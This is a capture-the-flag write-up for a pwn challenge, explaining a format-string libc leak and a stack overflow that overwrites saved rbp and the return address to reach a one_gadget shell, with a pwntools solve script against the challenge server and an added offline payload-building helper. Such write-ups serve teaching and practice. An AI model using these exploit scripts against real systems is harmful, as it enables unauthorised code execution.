
[EN] Exploit Me 1

tags: Writeup Pwn English

Curious

Train of Thought & Solution

First, load chal into IDA.

From the decompilation it is clear that the challenge gives us two things: a format-string (FMT) bug that can leak an address off the stack, and a second input that lets us overwrite the saved rbp and the return address. The plan is therefore to leak a libc address with the format string, and then return into a one_gadget to get a shell.

Next, look at the constraints reported by one_gadget for the chosen gadget: rbp-0x78 must be writable, and rsi and rdx must each be NULL (or point to NULL).

If you look carefully at the asm of main, the function ends with xor rsi, rsi and xor rdx, rdx, so the rsi and rdx constraints are already satisfied by the time the gadget runs. The only remaining condition is that rbp-0x78 is writable. Since we have already leaked the libc base, we can overwrite the saved rbp with an address inside libc's writable segment; that value is restored into rbp when main returns, right before the gadget executes, so the constraint holds.

Solve Script :

```python
from pwn import *

context.arch = 'amd64'

# r = process('./chal')
r = remote('lotuxctf.com', 10007)

# Stage 1: format-string leak. The 9th positional argument is a libc
# return address on the stack; subtracting its offset gives the libc base.
r.sendlineafter(b'> ', b'%9$p')
libc = int(r.recvline().strip(), 16) - 0x029d90
info(f'libc : {hex(libc)}')

# Stage 2: the one_gadget needs rbp-0x78 writable, so point the saved rbp
# into libc's writable segment and overwrite the return address with the gadget.
one_gadget = libc + 0xebcf8
buf = libc + 0x21af00
r.sendlineafter(b'> ', b'a' * 0x10 + flat(buf, one_gadget))  # padding | saved rbp | return address
r.interactive()
```
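As an added example (not part of the original writeup), here is the same leak-and-payload arithmetic written without pwntools, so the offsets can be sanity-checked offline before touching the remote service. The offsets are the ones from the solve script; the page-alignment check on the libc base and the newline check on the payload are my additions, and the assumption that the overflowing read stops at a newline (gets/fgets-style input) is mine, not something the writeup states.

```python
import struct

# Offsets taken from the writeup's solve script (glibc build used by the service).
LEAK_OFFSET = 0x029d90   # distance of the value leaked by %9$p from libc base
ONE_GADGET = 0xebcf8     # execve("/bin/sh") gadget; needs [rbp-0x78] writable
WRITABLE = 0x21af00      # address inside libc's writable segment, used as the fake rbp
PADDING = 0x10           # bytes from the start of the buffer to the saved rbp


def libc_base_from_leak(leak_line: bytes) -> int:
    """Turn the raw reply to '%9$p' (e.g. b'0x7ffff7da9d90\\n') into the libc base."""
    leak = int(leak_line.strip(), 16)
    base = leak - LEAK_OFFSET
    # A correct leak/offset pair always gives a page-aligned base. Anything else
    # means the format-string index or the libc offset is wrong for this build.
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page aligned: wrong offset or index?")
    return base


def build_payload(base: int) -> bytes:
    """padding | fake saved rbp (writable libc address) | return address (one_gadget)."""
    fake_rbp = base + WRITABLE
    gadget = base + ONE_GADGET
    payload = b"a" * PADDING + struct.pack("<QQ", fake_rbp, gadget)
    # Assumption: the overflowing read stops at a newline, so a 0x0a byte inside
    # either address would truncate the payload before the return address lands.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte; pick a different writable address")
    return payload


if __name__ == "__main__":
    # Constructed leak: a base of 0x7ffff7d80000 plus LEAK_OFFSET, as the service would print it.
    base = libc_base_from_leak(b"0x7ffff7da9d90\n")
    print(f"libc base  : {base:#x}")
    print(f"payload    : {build_payload(base).hex()}")
```

The two checks are the ones that catch the common failure modes of this kind of exploit: a non-page-aligned base means the wrong stack slot or libc version, and a stray newline means the payload never reaches the return address.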